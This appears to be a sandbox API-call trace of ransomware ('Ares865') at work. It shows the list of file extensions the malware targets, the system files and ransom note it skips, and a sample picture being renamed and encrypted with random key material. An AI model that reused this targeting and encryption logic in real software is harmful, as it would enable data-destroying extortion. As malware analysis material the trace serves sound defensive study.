lstrlenW (lpString="xml") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="xml") returned -1 [0044.853] lstrlenW (lpString="$er") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="$er") returned 1 [0044.853] lstrlenW (lpString="4dd") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="4dd") returned 1 [0044.853] lstrlenW (lpString="4dl") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="4dl") returned 1 [0044.853] lstrlenW (lpString="^^^") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="^^^") returned 1 [0044.853] lstrlenW (lpString="abs") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="abs") returned 1 [0044.853] lstrlenW (lpString="abx") returned 3 [0044.853] lstrcmpiW (lpString1="jpg", lpString2="abx") returned 1 [0044.853] lstrlenW (lpString="accdb") returned 5 [0044.853] lstrcmpiW (lpString1="s.jpg", lpString2="accdb") returned 1 [0044.853] lstrlenW (lpString="accdc") returned 5 [0044.853] lstrcmpiW (lpString1="s.jpg", lpString2="accdc") returned 1 [0044.853] lstrlenW (lpString="accde") returned 5 [0044.854] lstrcmpiW (lpString1="s.jpg", lpString2="accde") returned 1 [0044.854] lstrlenW (lpString="accdr") returned 5 [0044.854] lstrcmpiW (lpString1="s.jpg", lpString2="accdr") returned 1 [0044.854] lstrlenW (lpString="accdt") returned 5 [0044.854] lstrcmpiW (lpString1="s.jpg", lpString2="accdt") returned 1 [0044.854] lstrlenW (lpString="accdw") returned 5 [0044.854] lstrcmpiW (lpString1="s.jpg", lpString2="accdw") returned 1 [0044.854] lstrlenW (lpString="accft") returned 5 [0044.854] lstrcmpiW (lpString1="s.jpg", lpString2="accft") returned 1 [0044.854] lstrlenW (lpString="adb") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0044.854] lstrlenW (lpString="adb") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="adb") returned 1 [0044.854] lstrlenW (lpString="ade") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="ade") returned 1 [0044.854] lstrlenW (lpString="adf") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="adf") returned 1 [0044.854] lstrlenW (lpString="adn") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="adn") returned 1 [0044.854] lstrlenW (lpString="adp") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="adp") returned 1 [0044.854] lstrlenW (lpString="alf") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="alf") returned 1 [0044.854] lstrlenW (lpString="ask") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="ask") returned 1 [0044.854] lstrlenW (lpString="btr") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="btr") returned 1 [0044.854] lstrlenW (lpString="cat") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="cat") returned 1 [0044.854] lstrlenW (lpString="cdb") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="cdb") returned 1 [0044.854] lstrlenW (lpString="ckp") returned 3 [0044.854] lstrcmpiW (lpString1="jpg", lpString2="ckp") returned 1 [0044.854] lstrlenW (lpString="cma") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="cma") returned 1 [0044.855] lstrlenW (lpString="cpd") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="cpd") returned 1 [0044.855] lstrlenW (lpString="dacpac") returned 6 [0044.855] lstrcmpiW (lpString1="as.jpg", lpString2="dacpac") returned -1 [0044.855] lstrlenW (lpString="dad") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dad") returned 1 [0044.855] lstrlenW (lpString="dadiagrams") returned 10 [0044.855] lstrcmpiW (lpString1="angeas.jpg", lpString2="dadiagrams") returned -1 [0044.855] lstrlenW (lpString="daschema") returned 8 [0044.855] lstrcmpiW (lpString1="geas.jpg", lpString2="daschema") returned 1 [0044.855] lstrlenW (lpString="db-journal") returned 10 [0044.855] lstrcmpiW (lpString1="angeas.jpg", lpString2="db-journal") returned -1 [0044.855] lstrlenW (lpString="db-shm") returned 6 [0044.855] lstrcmpiW (lpString1="as.jpg", lpString2="db-shm") returned -1 [0044.855] lstrlenW (lpString="db-wal") returned 6 [0044.855] lstrcmpiW (lpString1="as.jpg", lpString2="db-wal") returned -1 [0044.855] lstrlenW (lpString="dbc") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dbc") returned 1 [0044.855] lstrlenW (lpString="dbs") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dbs") returned 1 [0044.855] lstrlenW (lpString="dbt") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dbt") returned 1 [0044.855] lstrlenW (lpString="dbv") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dbv") returned 1 [0044.855] lstrlenW (lpString="dbx") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dbx") returned 1 [0044.855] lstrlenW (lpString="dcb") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dcb") returned 1 [0044.855] lstrlenW (lpString="dct") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dct") returned 1 [0044.855] lstrlenW (lpString="dcx") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="dcx") returned 1 [0044.855] lstrlenW (lpString="ddl") returned 3 [0044.855] lstrcmpiW (lpString1="jpg", lpString2="ddl") returned 1 [0044.856] lstrlenW (lpString="dlis") returned 4 [0044.856] lstrcmpiW (lpString1=".jpg", lpString2="dlis") returned -1 [0044.856] lstrlenW (lpString="dp1") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="dp1") returned 1 [0044.856] lstrlenW (lpString="dqy") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="dqy") returned 1 [0044.856] lstrlenW (lpString="dsk") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="dsk") returned 1 [0044.856] lstrlenW (lpString="dsn") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="dsn") returned 1 [0044.856] lstrlenW (lpString="dtsx") returned 4 [0044.856] lstrcmpiW (lpString1=".jpg", lpString2="dtsx") returned -1 [0044.856] lstrlenW (lpString="dxl") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="dxl") returned 1 [0044.856] lstrlenW (lpString="eco") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="eco") returned 1 [0044.856] lstrlenW (lpString="ecx") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="ecx") returned 1 [0044.856] lstrlenW (lpString="edb") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="edb") returned 1 [0044.856] lstrlenW (lpString="epim") returned 4 [0044.856] lstrcmpiW (lpString1=".jpg", lpString2="epim") returned -1 [0044.856] lstrlenW (lpString="fcd") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="fcd") returned 1 [0044.856] lstrlenW (lpString="fdb") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="fdb") returned 1 [0044.856] lstrlenW (lpString="fic") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="fic") returned 1 [0044.856] lstrlenW (lpString="flexolibrary") returned 12 [0044.856] lstrcmpiW (lpString1="drangeas.jpg", lpString2="flexolibrary") returned -1 [0044.856] lstrlenW (lpString="fm5") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="fm5") returned 1 [0044.856] lstrlenW (lpString="fmp") returned 3 [0044.856] lstrcmpiW (lpString1="jpg", lpString2="fmp") returned 1 [0044.856] lstrlenW (lpString="fmp12") returned 5 [0044.857] lstrcmpiW (lpString1="s.jpg", lpString2="fmp12") returned 1 [0044.857] lstrlenW (lpString="fmpsl") returned 5 [0044.857] lstrcmpiW (lpString1="s.jpg", lpString2="fmpsl") returned 1 [0044.857] lstrlenW (lpString="fol") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="fol") returned 1 [0044.857] lstrlenW (lpString="fp3") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="fp3") returned 1 [0044.857] lstrlenW (lpString="fp4") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="fp4") returned 1 [0044.857] lstrlenW (lpString="fp5") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="fp5") returned 1 [0044.857] lstrlenW (lpString="fp7") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="fp7") returned 1 [0044.857] lstrlenW (lpString="fpt") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="fpt") returned 1 [0044.857] lstrlenW (lpString="frm") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="frm") returned 1 [0044.857] lstrlenW (lpString="gdb") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0044.857] lstrlenW (lpString="gdb") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="gdb") returned 1 [0044.857] lstrlenW (lpString="grdb") returned 4 [0044.857] lstrcmpiW (lpString1=".jpg", lpString2="grdb") returned -1 [0044.857] lstrlenW (lpString="gwi") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="gwi") returned 1 [0044.857] lstrlenW (lpString="hdb") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="hdb") returned 1 [0044.857] lstrlenW (lpString="his") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="his") returned 1 [0044.857] lstrlenW (lpString="ib") returned 2 [0044.857] lstrcmpiW (lpString1="pg", lpString2="ib") returned 1 [0044.857] lstrlenW (lpString="idb") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="idb") returned 1 [0044.857] lstrlenW (lpString="ihx") returned 3 [0044.857] lstrcmpiW (lpString1="jpg", lpString2="ihx") returned 1 [0044.857] lstrlenW (lpString="itdb") returned 4 [0044.858] lstrcmpiW (lpString1=".jpg", lpString2="itdb") returned -1 [0044.858] lstrlenW (lpString="itw") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="itw") returned 1 [0044.858] lstrlenW (lpString="jet") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="jet") returned 1 [0044.858] lstrlenW (lpString="jtx") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="jtx") returned -1 [0044.858] lstrlenW (lpString="kdb") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="kdb") returned -1 [0044.858] lstrlenW (lpString="kexi") returned 4 [0044.858] lstrcmpiW (lpString1=".jpg", lpString2="kexi") returned -1 [0044.858] lstrlenW (lpString="kexic") returned 5 [0044.858] lstrcmpiW (lpString1="s.jpg", lpString2="kexic") returned 1 [0044.858] lstrlenW (lpString="kexis") returned 5 [0044.858] lstrcmpiW (lpString1="s.jpg", lpString2="kexis") returned 1 [0044.858] lstrlenW (lpString="lgc") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="lgc") returned -1 [0044.858] lstrlenW (lpString="lwx") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="lwx") returned -1 [0044.858] lstrlenW (lpString="maf") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="maf") returned -1 [0044.858] lstrlenW (lpString="maq") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="maq") returned -1 [0044.858] lstrlenW (lpString="mar") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="mar") returned -1 [0044.858] lstrlenW (lpString="marshal") returned 7 [0044.858] lstrcmpiW (lpString1="eas.jpg", lpString2="marshal") returned -1 [0044.858] lstrlenW (lpString="mas") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="mas") returned -1 [0044.858] lstrlenW (lpString="mav") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="mav") returned -1 [0044.858] lstrlenW (lpString="maw") returned 3 [0044.858] lstrcmpiW (lpString1="jpg", lpString2="maw") returned -1 [0044.858] lstrlenW (lpString="mdbhtml") returned 7 [0044.859] lstrcmpiW (lpString1="eas.jpg", lpString2="mdbhtml") returned -1 [0044.859] lstrlenW (lpString="mdn") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="mdn") returned -1 [0044.859] lstrlenW (lpString="mdt") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="mdt") returned -1 [0044.859] lstrlenW (lpString="mfd") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="mfd") returned -1 [0044.859] lstrlenW (lpString="mpd") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="mpd") returned -1 [0044.859] lstrlenW (lpString="mrg") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="mrg") returned -1 [0044.859] lstrlenW (lpString="mud") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="mud") returned -1 [0044.859] lstrlenW (lpString="mwb") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="mwb") returned -1 [0044.859] lstrlenW (lpString="myd") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="myd") returned -1 [0044.859] lstrlenW (lpString="ndf") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="ndf") returned -1 [0044.859] lstrlenW (lpString="nnt") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="nnt") returned -1 [0044.859] lstrlenW (lpString="nrmlib") returned 6 [0044.859] lstrcmpiW (lpString1="as.jpg", lpString2="nrmlib") returned -1 [0044.859] lstrlenW (lpString="ns2") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="ns2") returned -1 [0044.859] lstrlenW (lpString="ns3") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="ns3") returned -1 [0044.859] lstrlenW (lpString="ns4") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="ns4") returned -1 [0044.859] lstrlenW (lpString="nsf") returned 3 [0044.859] lstrcmpiW (lpString1="jpg", lpString2="nsf") returned -1 [0044.859] lstrlenW (lpString="nv") returned 2 [0044.859] lstrcmpiW (lpString1="pg", lpString2="nv") returned 1 [0044.860] lstrlenW (lpString="nv2") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="nv2") returned -1 [0044.860] lstrlenW (lpString="nwdb") returned 4 [0044.860] lstrcmpiW (lpString1=".jpg", lpString2="nwdb") returned -1 [0044.860] lstrlenW (lpString="nyf") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="nyf") returned -1 [0044.860] lstrlenW (lpString="odb") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0044.860] lstrlenW (lpString="odb") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="odb") returned -1 [0044.860] lstrlenW (lpString="oqy") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="oqy") returned -1 [0044.860] lstrlenW (lpString="ora") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="ora") returned -1 [0044.860] lstrlenW (lpString="orx") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="orx") returned -1 [0044.860] lstrlenW (lpString="owc") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="owc") returned -1 [0044.860] lstrlenW (lpString="p96") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="p96") returned -1 [0044.860] lstrlenW (lpString="p97") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="p97") returned -1 [0044.860] lstrlenW (lpString="pan") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="pan") returned -1 [0044.860] lstrlenW (lpString="pdb") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="pdb") returned -1 [0044.860] lstrlenW (lpString="pdm") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="pdm") returned -1 [0044.860] lstrlenW (lpString="pnz") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="pnz") returned -1 [0044.860] lstrlenW (lpString="qry") returned 3 [0044.860] lstrcmpiW (lpString1="jpg", lpString2="qry") returned -1 [0044.861] lstrlenW (lpString="qvd") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="qvd") returned -1 [0044.861] lstrlenW (lpString="rbf") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="rbf") returned -1 [0044.861] lstrlenW (lpString="rctd") returned 4 [0044.861] lstrcmpiW (lpString1=".jpg", lpString2="rctd") returned -1 [0044.861] lstrlenW (lpString="rod") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="rod") returned -1 [0044.861] lstrlenW (lpString="rodx") returned 4 [0044.861] lstrcmpiW (lpString1=".jpg", lpString2="rodx") returned -1 [0044.861] lstrlenW (lpString="rpd") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="rpd") returned -1 [0044.861] lstrlenW (lpString="rsd") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="rsd") returned -1 [0044.861] lstrlenW (lpString="sas7bdat") returned 8 [0044.861] lstrcmpiW (lpString1="geas.jpg", lpString2="sas7bdat") returned -1 [0044.861] lstrlenW (lpString="sbf") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="sbf") returned -1 [0044.861] lstrlenW (lpString="scx") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="scx") returned -1 [0044.861] lstrlenW (lpString="sdb") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="sdb") returned -1 [0044.861] lstrlenW (lpString="sdc") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="sdc") returned -1 [0044.861] lstrlenW (lpString="sdf") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="sdf") returned -1 [0044.861] lstrlenW (lpString="sis") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="sis") returned -1 [0044.861] lstrlenW (lpString="spq") returned 3 [0044.861] lstrcmpiW (lpString1="jpg", lpString2="spq") returned -1 [0044.861] lstrlenW (lpString="te") returned 2 [0044.861] lstrcmpiW (lpString1="pg", lpString2="te") returned -1 [0044.861] lstrlenW (lpString="teacher") returned 7 [0044.861] lstrcmpiW (lpString1="eas.jpg", lpString2="teacher") returned -1 [0044.862] lstrlenW (lpString="tmd") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="tmd") returned -1 [0044.862] lstrlenW (lpString="tps") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="tps") returned -1 [0044.862] lstrlenW (lpString="trc") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0044.862] lstrlenW (lpString="trc") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="trc") returned -1 [0044.862] lstrlenW (lpString="trm") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="trm") returned -1 [0044.862] lstrlenW (lpString="udb") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="udb") returned -1 [0044.862] lstrlenW (lpString="udl") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="udl") returned -1 [0044.862] lstrlenW (lpString="usr") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="usr") returned -1 [0044.862] lstrlenW (lpString="v12") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="v12") returned -1 [0044.862] lstrlenW (lpString="vis") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="vis") returned -1 [0044.862] lstrlenW (lpString="vpd") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="vpd") returned -1 [0044.862] lstrlenW (lpString="vvv") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="vvv") returned -1 [0044.862] lstrlenW (lpString="wdb") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="wdb") returned -1 [0044.862] lstrlenW (lpString="wmdb") returned 4 [0044.862] lstrcmpiW (lpString1=".jpg", lpString2="wmdb") returned -1 [0044.862] lstrlenW (lpString="wrk") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="wrk") returned -1 [0044.862] lstrlenW (lpString="xdb") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="xdb") returned -1 [0044.862] lstrlenW (lpString="xld") returned 3 [0044.862] lstrcmpiW (lpString1="jpg", lpString2="xld") returned -1 [0044.863] lstrlenW (lpString="xmlff") returned 5 [0044.863] lstrcmpiW (lpString1="s.jpg", lpString2="xmlff") returned -1 [0044.863] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.Ares865") returned 63 [0044.863] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.ares865"), dwFlags=0x1) returned 1 [0044.863] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.Ares865" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0044.863] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=595284) returned 1 [0044.863] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0044.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbbd0 [0044.864] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0044.864] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0044.864] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0044.864] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0044.865] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x91860, lpName=0x0) returned 0x168 [0044.866] MapViewOfFile (hFileMappingObject=0x168, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91860) returned 0xb80000 [0045.035] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0045.036] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0045.036] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0045.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0045.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0045.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2cb310 [0045.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0045.036] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0045.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0045.036] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2cb310 [0045.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0045.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cb310 | out: hHeap=0x2b0000) returned 1 [0045.037] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0045.037] UnmapViewOfFile (lpBaseAddress=0xb80000) returned 1 [0045.042] CloseHandle (hObject=0x168) returned 1 [0045.042] CloseHandle (hObject=0x164) returned 1 [0045.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbbd0 | out: hHeap=0x2b0000) returned 1 [0045.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0045.053] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0045.056] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xbd616, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jellyfish.jpg", cAlternateFileName="JELLYF~1.JPG")) returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="aoldtz.exe") returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".") returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="..") returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="windows") returned -1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="bootmgr") returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="temp") returned -1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="pagefile.sys") returned -1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="boot") returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="ids.txt") returned 1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="ntuser.dat") returned -1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="perflogs") returned -1 [0045.056] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2="MSBuild") returned -1 [0045.056] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0045.057] lstrlenW (lpString="C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 55 [0045.057] lstrcpyW (in: lpString1=0x2cce452, lpString2="Jellyfish.jpg" | out: lpString1="Jellyfish.jpg") returned="Jellyfish.jpg" [0045.057] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0045.057] lstrlenW (lpString="Ares865") returned 7 [0045.057] lstrcmpiW (lpString1="ish.jpg", lpString2="Ares865") returned 1 [0045.057] lstrlenW (lpString=".dll") returned 4 [0045.057] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".dll") returned 1 [0045.057] lstrlenW (lpString=".lnk") returned 4 [0045.057] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".lnk") returned 1 [0045.057] lstrlenW (lpString=".ini") returned 4 [0045.057] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".ini") returned 1 [0045.057] lstrlenW (lpString=".sys") returned 4 [0045.057] lstrcmpiW (lpString1="Jellyfish.jpg", lpString2=".sys") returned 1 [0045.057] lstrlenW (lpString="Jellyfish.jpg") returned 13 [0045.057] lstrlenW (lpString="bak") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="bak") returned 1 [0045.057] lstrlenW (lpString="ba_") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="ba_") returned 1 [0045.057] lstrlenW (lpString="dbb") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="dbb") returned 1 [0045.057] lstrlenW (lpString="vmdk") returned 4 [0045.057] lstrcmpiW (lpString1=".jpg", lpString2="vmdk") returned -1 [0045.057] lstrlenW (lpString="rar") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="rar") returned -1 [0045.057] lstrlenW (lpString="zip") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="zip") returned -1 [0045.057] lstrlenW (lpString="tgz") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="tgz") returned -1 [0045.057] lstrlenW (lpString="vbox") returned 4 [0045.057] lstrcmpiW (lpString1=".jpg", lpString2="vbox") returned -1 [0045.057] lstrlenW (lpString="vdi") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="vdi") returned -1 [0045.057] lstrlenW (lpString="vhd") returned 3 [0045.057] lstrcmpiW (lpString1="jpg", lpString2="vhd") returned -1 [0045.057] lstrlenW (lpString="vhdx") returned 4 [0045.058] 